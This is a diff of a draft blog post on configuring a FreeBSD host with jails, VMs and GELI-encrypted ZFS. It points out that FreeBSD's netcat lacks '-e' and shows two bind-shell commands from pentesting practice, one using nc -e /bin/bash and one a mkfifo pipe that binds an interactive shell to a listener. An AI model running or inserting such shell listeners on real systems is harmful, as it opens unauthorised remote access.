gladiola/blog/_drafts/2019-12-15-coffeehouse.markdown

 On the host's /etc/rc.conf, we'll put values that enable jails and VMs.

+### A Major Pitfall
+When we were running an earlier experiment, we ran into a real hazard with some of the kernel modules for VirtualBox.
+We will need to be very careful to test out kernel modules produced during the vbox compilation process with `kldload`.
+If we load up a kernel module that won't work well onto a GELI-encrypted ZFS drive, then we'll have a very difficult recovery.
+So, we'll need to pick carefully before installing the kernel modules into the host's boot.conf.
+This hazard won't present itself until later, but it'll be related to editing the jails and the host when we begin installing applications.

+### We Get netcat For Free
+On the plus side, `nc` is a default command for FreeBSD base installs.
+We'll experiment with this some later.
+As we have already mentioned, `fetch` is also automatically included; it's FreeBSD's sister to `wget`.

+### netcat Doesn't Work The Same
+For those of us who've been pentesting with Kali Linux, it's common to see the following uses of netcat:
+{% highlight shell %}
+nc -nvlp 192.168.1.100 4444 -e /bin/bash
+{% endhighlight %}

+However, this presents a problem:  FreeBSD uses a different flavor of `nc`.
+The `-e` argument will not trigger the execution of a program.
+Instead, we will have to use `fifo` and pipes to set up something similar:

+{% highlight shell %}
+        rm -f /tmp/f; mkfifo /tmp/f
+        cat /tmp/f | /bin/sh -i 2>&1 | nc -l 127.0.0.1 1234 > /tmp/f
+{% endhighlight %}
+\[[25]\]\[[26]\]

+{% highlight shell %}
+{% endhighlight %}
  \[[]\]
 ## Annotated Bibliography
 \[1\]  FreeBSD Foundation.
 INTERNET: [`https://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/`](https://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/)